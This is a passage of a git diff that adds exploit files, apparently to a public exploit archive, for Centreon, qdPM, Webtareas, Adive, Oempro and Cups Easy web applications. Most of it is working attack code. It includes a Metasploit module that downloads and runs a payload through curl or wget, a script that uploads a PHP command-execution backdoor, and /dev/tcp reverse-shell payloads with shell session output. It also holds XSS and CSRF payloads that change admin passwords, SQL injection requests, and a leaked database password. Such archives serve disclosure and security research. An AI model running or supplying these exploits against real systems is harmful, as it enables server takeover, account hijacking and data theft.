+  xhttp = new XMLHttpRequest();
+  xhttp.open("POST", nuri, true);
+  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  xhttp.withCredentials = "true";
+  var body = "";
+  body += "\r\n\r\n";
+  body += 
+	"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
+  xhttp.send(body);
+  return true;
+}
+
+execute();
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
+
+-> Start a server and host the exp.js. Send the exp.js file in the xss payload
+
+Payload:- <script src="http://192.168.2.5/exp.js"></script>
+
+POST /admin/user/add HTTP/1.1
+Host: 192.168.2.5
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 143
+Origin: http://192.168.2.5
+DNT: 1
+Connection: close
+Referer: http://192.168.2.5/admin/user/add
+Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
+Upgrade-Insecure-Requests: 1
+
+userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3
+
+
+-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123
+
+|-----------------------------------------EOF-----------------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/47948.rb b/exploits/php/webapps/47948.rb
new file mode 100755
index 000000000..07edb76aa
--- /dev/null
+++ b/exploits/php/webapps/47948.rb
@@ -0,0 +1,185 @@
+####################################################################
+# This module requires Metasploit: https://metasploit.com/download #
+#  Current source: https://github.com/rapid7/metasploit-framework  #
+####################################################################
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+        "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
+        "Description" =>  %q{
+          Authenticated Remote Code Execution on Centreon Web Appliances.
+          Affected versions: =< 18.10, 19.04
+          By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
+          Vendor verified: 09/17/2019
+          Vendor patched: 10/16/2019
+          Public disclosure: 10/18/2019
+        },
+        "License" => MSF_LICENSE,
+        'Author' => [
+          'TheCyberGeek', # Discovery
+          'enjloezz' # Discovery and Metasploit Module
+        ],
+        'References' =>
+        [
+            ['URL','https://github.com/centreon/centreon/pull/7864'],
+            ['CVE','2019-16405']
+        ],
+        "Platform" => "linux",
+        "Targets" => [
+          ["Centreon", {}],
+        ],
+        "Stance" => Msf::Exploit::Stance::Aggressive,
+        "Privileged" => false,
+        "DisclosureDate" => "Oct 19 2019",
+        "DefaultOptions" => {
+          "SRVPORT" => 80,
+        },
+        "DefaultTarget" => 0
+      ))
+
+    register_options(
+      [
+        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
+        OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
+        OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
+        OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
+        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
+      ]
+    )
+  end
+
+  def exploit
+    begin
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "index.php"),
+        "method" => "GET",
+      )
+      @phpsessid = res.get_cookies
+      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+
+      unless token
+        vprint_error("Couldn't get token, check your TARGETURI")
+        return
+      end
+      res = send_request_cgi!(
+      "uri" => normalize_uri(target_uri.path, "index.php"),
+      "method" => "POST",
+      "cookie" => @phpsessid,
+      "vars_post" => {
+        "useralias" => datastore["USERNAME"],
+        "password" => datastore["PASSWORD"],
+        "centreon_token" => token,
+        },
+      )
+      unless res.body.include? "You need to enable JavaScript to run this app"
+        fail_with Failure::NoAccess "Cannot login to Centreon"
+      end
+      print_good("Login Successful!")
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "main.get.php"),
+        "method" => "GET",
+        "cookie" => @phpsessid,
+        "vars_get" => {
+          "p" => "60904",
+          "o" => "c",
+          "resource_id" => 1,
+        },
+      )
+      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "main.get.php"),
+        "vars_get" => {
+          "p" => "60904",
+          },
+        "method" => "POST",
+        "cookie" => @phpsessid,
+        "vars_post" => {
+          "resource_name": "$USER1$",
+          "resource_line": "/",
+          "instance_id": 1,
+          "resource_activate": 1,
+          "resource_comment": "Nagios Plugins Path",
+          "submitC": "Save",
+          "resource_id": 1,
+          "o": "c",
+          "initialValues": "" "a:0:{}" "",
+          "centreon_token": token
+        },
+      )
+      begin
+        Timeout.timeout(datastore["HTTPDELAY"]) { super }
+      rescue Timeout::Error
+        vprint_error("Server Timed Out...")
+      end
+    rescue ::Rex::ConnectionError
+      vprint_error("Connection error...")
+    end
+  end
+
+  def primer
+    @pl = generate_payload_exe
+    @path = service.resources.keys[0]
+    binding_ip = srvhost_addr
+
+    proto = ssl ? "https" : "http"
+    payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
+    send_payload(payload_uri)
+  end
+
+  def send_payload(payload_uri)
+    payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\""
+    print_good("Sending Payload")
+    send_request_cgi(
+      "uri" => normalize_uri(target_uri.path, "main.get.php"),
+      "method" => "POST",
+      "cookie" => @phpsessid,
+      "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
+    )
+  end
+
+  def on_request_uri(cli, req)
+    print_good("#{peer} - Payload request received: #{req.uri}")
+    send_response(cli, @pl)
+    run_shell
+    stop_service
+  end
+
+  def run_shell
+    print_good("Setting permissions for the payload")
+    res = send_request_cgi(
+      "uri" => normalize_uri(target_uri.path, "main.get.php"),
+      "method" => "POST",
+      "cookie" => @phpsessid,
+      "vars_get" => {
+        "p": "60801",
+        "command_hostaddress": "",
+        "command_example": "",
+        "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
+        "o": "p",
+        "min": 1,
+      },
+    )
+
+    print_good("Executing Payload")
+    res = send_request_cgi(
+      "uri" => normalize_uri(target_uri.path, "main.get.php"),
+      "method" => "POST",
+      "cookie" => @phpsessid,
+      "vars_get" => {
+        "p": "60801",
+        "command_hostaddress": "",
+        "command_example": "",
+        "command_line": "/tmp/#{@path}",
+        "o": "p",
+        "min": 1,
+      },
+    )
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47954.py b/exploits/php/webapps/47954.py
new file mode 100755
index 000000000..e846c590b
--- /dev/null
+++ b/exploits/php/webapps/47954.py
@@ -0,0 +1,130 @@
+# Exploit Title: qdPM 9.1 - Remote Code Execution
+# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
+# Date: 2020-01-22
+# Exploit Author: Rishal Dwivedi (Loginsoft)
+# Vendor Homepage: http://qdpm.net/
+# Software Link: http://qdpm.net/download-qdpm-free-project-management
+# Version: <=1.9.1
+# Tested on: Windows 10 (Python 2.7)
+# CVE : CVE-2020-7246
+# Exploit written in Python 2.7
+# Tested Environment - Windows 10
+# Path Traversal + Remote Code Execution
+
+# Command - qdpm-exploit.py -url http://localhost/ -u user@localhost.com -p password
+# -*- coding: utf-8 -*-
+#!/usr/bin/python
+
+import requests
+from lxml import html
+from argparse import ArgumentParser
+
+session_requests = requests.session()
+
+def multifrm(
+    userid,
+    username,
+    csrftoken_,
+    EMAIL,
+    HOSTNAME,
+    uservar,
+    ):
+    request_1 = {
+        'sf_method': (None, 'put'),
+        'users[id]': (None, userid[-1]),
+        'users[photo_preview]': (None, uservar),
+        'users[_csrf_token]': (None, csrftoken_[-1]),
+        'users[name]': (None, username[-1]),
+        'users[new_password]': (None, ''),
+        'users[email]': (None, EMAIL),
+        'extra_fields[9]': (None, ''),
+        'users[remove_photo]': (None, '1'),
+        }
+    return request_1
+
+
+def req(
+    userid,
+    username,
+    csrftoken_,
+    EMAIL,
+    HOSTNAME,
+    ):
+    request_1 = multifrm(
+        userid,
+        username,
+        csrftoken_,
+        EMAIL,
+        HOSTNAME,
+        '.htaccess',
+        )
+    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update'
+                                , files=request_1)
+    request_2 = multifrm(
+        userid,
+        username,
+        csrftoken_,
+        EMAIL,
+        HOSTNAME,
+        '../.htaccess',
+        )
+    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update'
+                                 , files=request_2)
+    request_3 = {
+        'sf_method': (None, 'put'),
+        'users[id]': (None, userid[-1]),
+        'users[photo_preview]': (None, ''),
+        'users[_csrf_token]': (None, csrftoken_[-1]),
+        'users[name]': (None, username[-1]),
+        'users[new_password]': (None, ''),
+        'users[email]': (None, EMAIL),
+        'extra_fields[9]': (None, ''),
+        'users[photo]': ('backdoor.php',
+                         '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
+                         , 'application/octet-stream'),
+        }
+    upload_req = session_requests.post(HOSTNAME
+            + 'index.php/myAccount/update', files=request_3)
+
+
+def main(HOSTNAME, EMAIL, PASSWORD):
+    result = session_requests.get(HOSTNAME + '/index.php/login')
+    login_tree = html.fromstring(result.text)
+    authenticity_token = \
+        list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value"
+             )))[0]
+    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
+               'login[_csrf_token]': authenticity_token}
+    result = session_requests.post(HOSTNAME + '/index.php/login',
+                                   data=payload,
+                                   headers=dict(referer=HOSTNAME
+                                   + '/index.php/login'))
+    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount'
+            )
+    account_tree = html.fromstring(account_page.content)
+    userid = account_tree.xpath("//input[@name='users[id]']/@value")
+    username = account_tree.xpath("//input[@name='users[name]']/@value")
+    csrftoken_ = \
+        account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
+    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
+    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
+    final_tree = html.fromstring(get_file.content)
+    backdoor = \
+        final_tree.xpath("//input[@name='users[photo_preview]']/@value")
+    print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' \
+        + backdoor[-1] + '?cmd=whoami'
+
+
+if __name__ == '__main__':
+    parser = \
+        ArgumentParser(description='qdmp - Path traversal + RCE Exploit'
+                       )
+    parser.add_argument('-url', '--host', dest='hostname',
+                        help='Project URL')
+    parser.add_argument('-u', '--email', dest='email',
+                        help='User email (Any privilege account)')
+    parser.add_argument('-p', '--password', dest='password',
+                        help='User password')
+    args = parser.parse_args()
+
+    main(args.hostname, args.email, args.password)
\ No newline at end of file
diff --git a/exploits/php/webapps/47959.txt b/exploits/php/webapps/47959.txt
new file mode 100644
index 000000000..10b00ec94
--- /dev/null
+++ b/exploits/php/webapps/47959.txt
@@ -0,0 +1,67 @@
+# Exploit Title: Webtareas 2.0 - 'id' SQL Injection
+# Date: 2020-01-23
+# Exploit Author: Greg.Priest
+# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
+# Software Link: http://webtareas.sourceforge.net/general/home.php
+# Version: Webtareas v2.0
+# Tested on: Windows
+# CVE : N/A
+
+Webtareas v2.0 authenticated Sql injection 0day
+
+Vulnerable Request:
+
+POST /webtareas/includes/general_serv.php HTTP/1.1
+Host: 10.61.57.147
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: */*
+Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 98
+Origin: http://10.61.57.147
+Connection: close
+Referer: http://10.61.57.147/webtareas/general/home.php?
+Cookie: webTareasSID=npmmte1hejtnsi35mcqbc97gse
+
+action=cardview-actions&prefix=..%2F&object=projects&tblnam=projects&extra=&extpath=&id=1[Vulnerable parameter!]&defact=Y
+
+--------------------------------------------------------------------------------------------------------------------------
+
+C:\Users\--------\Desktop\sqlmap>sqlmap.py -r webt01
+        ___
+       __H__
+ ___ ___[,]_____ ___ ___  {1.4.1.17#dev}
+|_ -| . [)]     | .'| . |
+|___|_  [.]_|_|_|__,|  _|
+      |_|V...       |_|   http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting @ 12:09:44 /2020-01-23/
+
+[12:09:44] [INFO] parsing HTTP request from 'webt01'
+[12:09:45] [WARNING] provided value for parameter 'extra' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+[12:09:45] [WARNING] provided value for parameter 'extpath' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+[12:09:45] [INFO] resuming back-end DBMS 'mysql'
+[12:09:45] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND 4597=4597 AND 'yvIt'='yvIt&defact=Y
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND (SELECT 4838 FROM (SELECT(SLEEP(5)))WYXW) AND 'lBki'='lBki&defact=Y
+---
+[12:09:45] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.3.13
+back-end DBMS: MySQL >= 5.0.12
+[12:09:45] [INFO] fetched data logged to text files under 'C:\Users\--------\AppData\Local\sqlmap\output\10.61.57.147'
+
+[*] ending @ 12:09:45 /2020-01-23/
+
+https://github.com/Gr3gPr1est/BugReport/blob/master/WebTareas2.0_Authenticated_SQLinjection_0day.pdf
\ No newline at end of file
diff --git a/exploits/php/webapps/47966.txt b/exploits/php/webapps/47966.txt
new file mode 100644
index 000000000..136d0cd0b
--- /dev/null
+++ b/exploits/php/webapps/47966.txt
@@ -0,0 +1,93 @@
+# Exploit Title:  Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)
+# Exploit Author: Sarthak Saini
+# Date: 2020-01-18
+# Vendor Link : https://www.adive.es/
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.8
+# CVE:CVE-2020-7991
+# Category: Webapps
+# Tested on: windows64bit / mozila firefox 
+# 
+#
+|--!>
+
+|----------------------------------------------------------------------------------
+
+1) Persistent Cross-site Scripting at user add page 
+
+Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting
+ 
+Payload:- <script>alert(1)</script>
+
+POST /admin/user/add HTTP/1.1
+Host: 192.168.2.5
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 62
+Origin: http://192.168.2.5
+DNT: 1
+Connection: close
+Referer: http://192.168.2.5/admin/user/add
+Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
+Upgrade-Insecure-Requests: 1
+
+userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3
+
+
+|----------------------------------------------------------------------------------
+
+
+2) account takeover - cross side request forgery (Change Admin Password)
+
+
+Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.
+
+-> Save the payload as exp.js
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
+function execute()
+{
+  var nuri ="http://192.168.2.5/admin/config";
+  xhttp = new XMLHttpRequest();
+  xhttp.open("POST", nuri, true);
+  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  xhttp.withCredentials = "true";
+  var body = "";
+  body += "\r\n\r\n";
+  body += 
+	"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
+  xhttp.send(body);
+  return true;
+}
+
+execute();
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
+
+-> Start a server and host the exp.js. Send the exp.js file in the xss payload
+
+Payload:- <script src="http://192.168.2.5/exp.js"></script>
+
+POST /admin/user/add HTTP/1.1
+Host: 192.168.2.5
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 143
+Origin: http://192.168.2.5
+DNT: 1
+Connection: close
+Referer: http://192.168.2.5/admin/user/add
+Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
+Upgrade-Insecure-Requests: 1
+
+userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3
+
+
+-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123
+
+|-----------------------------------------EOF-----------------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/47967.txt b/exploits/php/webapps/47967.txt
new file mode 100644
index 000000000..5e8006187
--- /dev/null
+++ b/exploits/php/webapps/47967.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
+# Date: 2020-01-27
+# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
+# Vendor Homepage: www2.octeth.com
+# Version: Octeth Oempro v.4.7 and v.4.8
+# Tested on: Oempro v.4.7
+# CVE : CVE-2019-19740
+
+
+An authenticated user can easily exploit this vulnerability. Octeth Oempro
+4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get
+is vulnerable.
+
+# Error condition
+POST /api.php HTTP/1.1
+Host: 127.0.0.1
+
+command=Campaign.Get&CampaignID=2019'&responseformat=JSON
+
+# SQL Injection exploitation
+POST /api.php HTTP/1.1
+Host: 127.0.0.1
+
+command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON
\ No newline at end of file
diff --git a/exploits/php/webapps/47968.txt b/exploits/php/webapps/47968.txt
new file mode 100644
index 000000000..494efaa1c
--- /dev/null
+++ b/exploits/php/webapps/47968.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Centreon 19.10.5 - Database Credentials Disclosure
+# Date: 2020-01-27
+# Exploit Author: Fabien AUNAY, Omri Baso
+# Vendor Homepage: https://www.centreon.com/
+# Software Link: https://github.com/centreon/centreon
+# Version: 19.10.5
+# Tested on: CentOS 7
+# CVE : -
+
+###########################################################################################################
+Centreon 19.10.5 Database Credentials Disclosure
+
+Trusted by SMBs and Fortune 500 companies worldwide.
+An industry reference in IT Infrastructure monitoring for the enterprise.
+Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
+Presence in Toronto and Luxembourg.
+Deployed in diverse sectors:
+- IT & telecommunication
+- Transportation
+- Government
+- Heath care
+- Retail
+- Utilities
+- Finance & Insurance
+- Aerospace & Defense
+- Manufacturing
+- etc.
+
+###########################################################################################################
+
+POC:
+
+- Configuration / Pollers / Broker configuration
+-- Central-broker | Central-broker-master
+--- Output
+
+It is possible to discover the unencrypted password with the inspector.
+
+
+DB user        centreon
+DB password    ********
+<input size="120" name="output[0][db_password]" type="password" value="ZVy892xx">
\ No newline at end of file
diff --git a/exploits/php/webapps/47969.txt b/exploits/php/webapps/47969.txt
new file mode 100644
index 000000000..45370e323
--- /dev/null
+++ b/exploits/php/webapps/47969.txt
@@ -0,0 +1,143 @@
+# Exploit Title: Centreon 19.10.5 - Remote Command Execution
+# Date: 2020-01-27
+# Exploit Author: Fabien AUNAY, Omri BASO
+# Vendor Homepage: https://www.centreon.com/
+# Software Link: https://github.com/centreon/centreon
+# Version: 19.10.5
+# Tested on: CentOS 7
+# CVE : -
+
+###########################################################################################################
+Centreon 19.10.5 Remote Command Execution Resources
+
+Trusted by SMBs and Fortune 500 companies worldwide.
+An industry reference in IT Infrastructure monitoring for the enterprise.
+Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
+Presence in Toronto and Luxembourg.
+Deployed in diverse sectors:
+- IT & telecommunication
+- Transportation
+- Government
+- Heath care
+- Retail
+- Utilities
+- Finance & Insurance
+- Aerospace & Defense
+- Manufacturing
+- etc.
+
+It is possible to call binaries not only in default $USER$ path by adding Poller's Resources.
+By adding two entries it is possible to trigger a download exec reverse shell.
+Note, your reverse shell is persistent because Centreon execute your payloads all 10 minutes by default.
+
+Steps:
+Objective 1 : Add Download Resource
+Objective 2 : Add Exec Resource
+Objective 3 : Create your both commands check
+Objective 4 : Create your services and link them with a host
+
+Restart the Central.
+
+###########################################################################################################
+
+# Objective 1 : Add Download Resource
+- Configuration/Pollers/Resources
+
+- Problem:
+Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
+Illegal Macro Output Characters : `~$^&"|'<>
+Maximum client side input size limit: 35
+
+- Information:
+Read Centreon documentation:
+To install Centreon software from the repository, you should first install the centreon-release package,
+which will provide the repository file. Some may not have the wget package installed.
+If not perform the following : yum install wget
+
+Solution 1: Remove restriction in Configuration/Pollers/Engine configuration
+Solution 2: Modify input size inspector in client side <input> size="250"
+Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh
+
+
+# Objective 2 : Add Exec Resource
+- Configuration/Pollers/Resources
+
+- Problem:
+Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
+Illegal Macro Output Characters : `~$^&"|'<>
+Maximum client side input size limit: 35
+
+Solution: Use a custom payload -> bash /tmp/x.sh
+
+
+# Objective 3 : Create your both commands check with your resources $xxx$ without arguments
+# Objective 4 : Create your services and link them with a host
+
+
+POC:
+Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
+
+python -m SimpleHTTPServer 8080
+Serving HTTP on 0.0.0.0 port 8080 ...
+127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -
+
+
+nc -lvnp 1234
+Ncat: Version 7.50
+Ncat: Listening on :::1234
+Ncat: Listening on 0.0.0.0:1234
+Ncat: Connection from 127.0.0.1.
+Ncat: Connection from 127.0.0.1:43128.
+id
+uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
+sudo -l
+Matching Defaults entries for centreon-engine on centreon-lab:
+    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
+    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
+    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
+    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
+    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
+    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
+    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
+
+User centreon-engine may run the following commands on centreon-lab:
+    (root) NOPASSWD: /sbin/service centreontrapd start
+    (root) NOPASSWD: /sbin/service centreontrapd stop
+    (root) NOPASSWD: /sbin/service centreontrapd restart
+    (root) NOPASSWD: /sbin/service centreontrapd reload
+    (root) NOPASSWD: /usr/sbin/service centreontrapd start
+    (root) NOPASSWD: /usr/sbin/service centreontrapd stop
+    (root) NOPASSWD: /usr/sbin/service centreontrapd restart
+    (root) NOPASSWD: /usr/sbin/service centreontrapd reload
+    (root) NOPASSWD: /sbin/service centengine start
+    (root) NOPASSWD: /sbin/service centengine stop
+    (root) NOPASSWD: /sbin/service centengine restart
+    (root) NOPASSWD: /sbin/service centengine reload
+    (root) NOPASSWD: /usr/sbin/service centengine start
+    (root) NOPASSWD: /usr/sbin/service centengine stop
+    (root) NOPASSWD: /usr/sbin/service centengine restart
+    (root) NOPASSWD: /usr/sbin/service centengine reload
+    (root) NOPASSWD: /bin/systemctl start centengine
+    (root) NOPASSWD: /bin/systemctl stop centengine
+    (root) NOPASSWD: /bin/systemctl restart centengine
+    (root) NOPASSWD: /bin/systemctl reload centengine
+    (root) NOPASSWD: /usr/bin/systemctl start centengine
+    (root) NOPASSWD: /usr/bin/systemctl stop centengine
+    (root) NOPASSWD: /usr/bin/systemctl restart centengine
+    (root) NOPASSWD: /usr/bin/systemctl reload centengine
+    (root) NOPASSWD: /sbin/service cbd start
+    (root) NOPASSWD: /sbin/service cbd stop
+    (root) NOPASSWD: /sbin/service cbd restart
+    (root) NOPASSWD: /sbin/service cbd reload
+    (root) NOPASSWD: /usr/sbin/service cbd start
+    (root) NOPASSWD: /usr/sbin/service cbd stop
+    (root) NOPASSWD: /usr/sbin/service cbd restart
+    (root) NOPASSWD: /usr/sbin/service cbd reload
+    (root) NOPASSWD: /bin/systemctl start cbd
+    (root) NOPASSWD: /bin/systemctl stop cbd
+    (root) NOPASSWD: /bin/systemctl restart cbd
+    (root) NOPASSWD: /bin/systemctl reload cbd
+    (root) NOPASSWD: /usr/bin/systemctl start cbd
+    (root) NOPASSWD: /usr/bin/systemctl stop cbd
+    (root) NOPASSWD: /usr/bin/systemctl restart cbd
+    (root) NOPASSWD: /usr/bin/systemctl reload cbd
\ No newline at end of file
diff --git a/exploits/php/webapps/47973.txt b/exploits/php/webapps/47973.txt
new file mode 100644
index 000000000..954449214
--- /dev/null
+++ b/exploits/php/webapps/47973.txt
@@ -0,0 +1,45 @@
+# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
+# Date: 2020-01-28
+# Exploit Author: J3rryBl4nks
+# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/
+# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/
+# Version: 1.0
+# Tested on Windows 10/Kali Rolling
+# CVE: CVE-2020-8424, CVE-2020-8425
+
+# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery 
+# that would allow an attacker to change the Admin password and gain unrestricted 
+# access to the site or delete any user.
+
+# Proof of Concept Code for Password Change:
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">
+      <input type="hidden" name="username" value="admin" />
+      <input type="hidden" name="password" value="PASSWORDHERE" />
+      <input type="hidden" name="change" value="Change" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+# Proof of concept for user delete:
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST">
+      <input type="hidden" name="username" value="admin" />
+      <input type="hidden" name="delete" value="Delete" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47977.txt b/exploits/php/webapps/47977.txt
new file mode 100644
index 000000000..aa46bf1da
--- /dev/null
+++ b/exploits/php/webapps/47977.txt
@@ -0,0 +1,65 @@
+# Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution
+# Date: 2020-01-27
+# Exploit Author: Omri Baso, Fabien Aunay
+# Vendor Homepage: https://www.centreon.com/
+# Software Link: https://github.com/centreon/centreon
+# Version: 19.10.5
+# Tested on: CentOS 7.7
+# CVE : -
+
+
+Centreon 19.10.5 Remote Command Execution Misc
+
+Trusted by SMBs and Fortune 500 companies worldwide.
+An industry reference in IT Infrastructure monitoring for the enterprise.
+Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
+Presence in Toronto and Luxembourg.
+Deployed in diverse sectors:
+- IT & telecommunication
+- Transportation
+- Government
+- Heath care
+- Retail
+- Utilities
+- Finance & Insurance
+- Aerospace & Defense
+- Manufacturing
+- etc.
+
+
+User input isn't sanitized for safe use - and it is possible to gain a Remote Code Execution of the server
+hosting the Centreon Service leading to a full server takeover with the user "apache"
+
+Steps:
+1.) <BASEURL>/centreon/main.php?p=60803&type=3
+     Here we create the Command - can also be found under
+     Configuration  >  Commands  >  Miscellaneous
+     we Press "Add" -
+     Command Name: "misc"
+     Payload: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
+
+2.) go to: <BASEURL>/centreon/main.php?p=60901
+     Configuration  >  Pollers
+     Open "Central" Poller
+     add on "Post-Restart command"
+     the command "misc" we created
+     make Status "Enabled"
+
+3.) Check the box "Post generation command" in the "Export Configuration" Tab
+    3.1) Restart Poller and get Shell.
+
+
+
+
+    ┌─[root@vps]─[~]
